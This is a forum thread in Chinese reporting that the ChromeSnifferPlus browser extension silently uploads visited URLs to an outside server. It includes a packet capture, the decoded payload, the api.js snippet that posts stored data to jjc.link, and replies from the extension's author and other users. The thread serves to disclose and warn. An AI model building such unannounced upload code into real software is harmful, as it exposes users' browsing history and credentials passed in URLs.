ChromeSnifferPlus 插件疑似恶意采集用户访问信息

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

For Existing Member Sign In

This topic created in 3777 days ago, the information mentioned may be changed or developed.

ChromeSnifferPlus 是国人开发的一款开源网站探测插件,可以探测正在使用的开源软件或者 js 类库，在国内外都有一定的使用群体
该插件会一定条件下把用户访问过的 url 地址，秘密发送到一个美国服务器
服务器 URL 地址为

http://jjc.link/status/v2

wireshark 抓包

POST /status/v2 HTTP/1.1
Host: jjc.link
Connection: keep-alive
Content-Length: 1126
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Origin: chrome-extension://modoldoikofeihcogpldkollonflkdic
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8

ld=%7B%22http%3A%2F%2Fqunaer.com%2F%22%3A%22%7B%5C%22libs%5C%22%3A%5C%22%7B%5C%5C%5C%22%E7%99%BE%E5%BA%A6%E7%BB%9F%E8%AE%A1%5C%5C%5C%22%3A-1%2C%5C%5C%5C%22jQuery%5C%5C%5C%22%3A%5C%5C%5C%221.9.1%5C%5C%5C%22%2C%5C%5C%5C%22jQuery%20UI%5C%5C%5C%22%3A%5C%5C%5C%221.10.3%5C%5C%5C%22%2C%5C%5C%5C%22PHP%5C%5C%5C%22%3A%5C%5C%5C%225.2.17p1%5C%5C%5C%22%2C%5C%5C%5C%22nginx%5C%5C%5C%22%3A-1%7D%5C%22%2C%5C%22add_time%5C%22%3A1451980052484%7D%22%2C%22http%3A%2F%2Fwww.sogou.com%2F%3Frfrom%3Dsoso%22%3A%22%7B%5C%22libs%5C%22%3A%5C%22%7B%5C%5C%5C%22jQuery%5C%5C%5C%22%3A%5C%5C%5C%221.11.0%5C%5C%5C%22%2C%5C%5C%5C%22nginx%5C%5C%5C%22%3A-1%7D%5C%22%2C%5C%22add_time%5C%22%3A1451979843360%7D%22%2C%22http%3A%2F%2Fwww.sogou.com%2Fweb%3Fquery%3Dmanager%26_asf%3Dwww.sogou.com%26_ast%3D%26ie%3Dutf8%26pid%3Ds.idx%26cid%3Ds.idx.se%26rfrom%3Dsoso%26unc%3D%26w%3D01019900%26sut%3D1368%26sst0%3D1451979849303%26lkt%3D7%252C1451979847939%252C1451979849111%22%3A%22%7B%5C%22libs%5C%22%3A%5C%22%7B%5C%5C%5C%22jQuery%5C%5C%5C%22%3A%5C%5C%5C%221.11.0%5C%5C%5C%22%2C%5C%5C%5C%22nginx%5C%5C%5C%22%3A-1%7D%5C%22%2C%5C%22add_time%5C%22%3A1451979854478%7D%22%7DHTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Jan 2016 07:47:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

14
....................
0

数据包解密内容

ld={"http://qunaer.com/":"{\"libs\":\"{\\\"百度统计\\\":-1,\\\"jQuery\\\":\\\"1.9.1\\\",\\\"jQuery UI\\\":\\\"1.10.3\\\",\\\"PHP\\\":\\\"5.2.17p1\\\",\\\"nginx\\\":-1}\",\"add_time\":1451980052484}","http://www.sogou.com/?rfrom=soso":"{\"libs\":\"{\\\"jQuery\\\":\\\"1.11.0\\\",\\\"nginx\\\":-1}\",\"add_time\":1451979843360}","http://www.sogou.com/web?query=manager&_asf=www.sogou.com&_ast=&ie=utf8&pid=s.idx&cid=s.idx.se&rfrom=soso&unc=&w=01019900&sut=1368&sst0=1451979849303&lkt=7%2C1451979847939%2C1451979849111":"{\"libs\":\"{\\\"jQuery\\\":\\\"1.11.0\\\",\\\"nginx\\\":-1}\",\"add_time\":1451979854478}"}

经过多次抓包，发现服务器返回值都为 14/0,所以基本可以判断不是云查询类功能

作者在 github 的开源地址为

https://github.com/justjavac/ChromeSnifferPlus

代码不多，经过排查，发现窃取信息的 js 为

https://github.com/justjavac/ChromeSnifferPlus/blob/master/js/api.js

代码片段

var url = 'http://jjc.link/status/v2';

        if (localStorage.length === 0) {
            return;
        }

        var data = "ld=" + encodeURIComponent(JSON.stringify(localStorage));

        xhr('POST', url, data, function(data, status, response){
            callback();
        });

该插件会把访问过的 url 都归类发往 jjc.link 服务器，根据网站的验证方式不同，可能会泄露的隐私

用户 ip
访问过的网站地址
网站后台
用户名 /密码（ get 方式）
session 值(get 方式)

暂时不知作者收集这些信息的目的，请使用 ChromeSnifferPlus 的用户多加小心

19 replies • 2016-01-07 19:56:52 +08:00

Ellison

Jan 6, 2016

@justjavac
直接圈作者啊

zwbai

Jan 6, 2016

奇怪我文章首页显示为什么会显示一天前呢

Tink

PRO

Jan 6, 2016

关注

Tink

PRO

Jan 6, 2016

@zwbai 下方又个置顶

oott123

Jan 6, 2016

居然发送 localStorage ，这地没法洗了吧。
没听说过什么统计脚本要统计 localStorage 的。

mcone

Jan 6, 2016

好奇怪的访问不懂 bd

coolzilj

Jan 7, 2016 via iPhone

作者已回复， https://github.com/justjavac/ChromeSnifferPlus/issues/58
这理由…接受不了把 localstorage 发送给别人，已卸

justjavac

Jan 7, 2016

所有代码都是开源的，大家可以审视

ooTwToo

Jan 7, 2016

wappalyzer 不知有没有这个问题

xbflrghc

Jan 7, 2016

这个不是开源的吗？到底收集了啥，看看不就知道了吗？

xbflrghc

Jan 7, 2016

@oott123
@coolzilj

插件只能访问插件记录的 localstorage ，这个应该不是发送了用户浏览器的 localstorage

xbflrghc

Jan 7, 2016

@ooTwToo https://github.com/AliasIO/Wappalyzer/blob/master/src/drivers/chrome/js/driver.js#L208_L242

wappalyzer 的源码

w.driver.post('https://ad.wappalyzer.com/log/wp/', w.adCache);

xhr.send('json=' + encodeURIComponent(JSON.stringify(data)));

justjavac

Jan 7, 2016

@coolzilj

"这理由…接受不了把 localstorage 发送给别人，已卸"

有必要解释一下了。不要代码片段而断章取义。我没有把 localstorage 发给别人，也没有访问用户的任何 localstorage 信息。

这个文件的代码运行在 background ，而 background 的代码是无法访问页面的，只能访问插件。这里的 localstorage 是插件为了存储探测到的信息而使用的。然后把信息发送到分析服务器。

ooTwToo

Jan 7, 2016

@xbflrghc 啊好吧，并没有把上传全部的 localstorage 。

oott123

Jan 7, 2016

好吧，如果是插件自己的 localStorage ，问题不大。

不过好在我也没用，哈哈哈（

zwbai

Jan 7, 2016

安装插件后，访问所有网站都会默认开启网站探测，发送插件自己的 localStorage ，意味着用插件期间访问什么还是发什么啊，也就是发送所有浏览记录，原来 360 云采集信息泄露， get 方式的验证密码的也是很多。。

zwbai

Jan 7, 2016

@xbflrghc @oott123 @justjavac 因为是个全局插件，全 url 地址采集，泄露敏感信息肯定是不可避免的，比如我看个小黄片啥的..隐私泄露具体可搜索 "360 隐私泄露门的演变时间表"做参考

oott123

Jan 7, 2016

@zwbai 这确实是会导致隐私泄漏问题，然而比上传 localStorage 的危害小多了。
#反正我也不用#
另外看更新记录，已经增加了选项去掉这个功能。

oott123

Jan 7, 2016

@oott123 看错了，是“将要”增加，不是“已经”增加。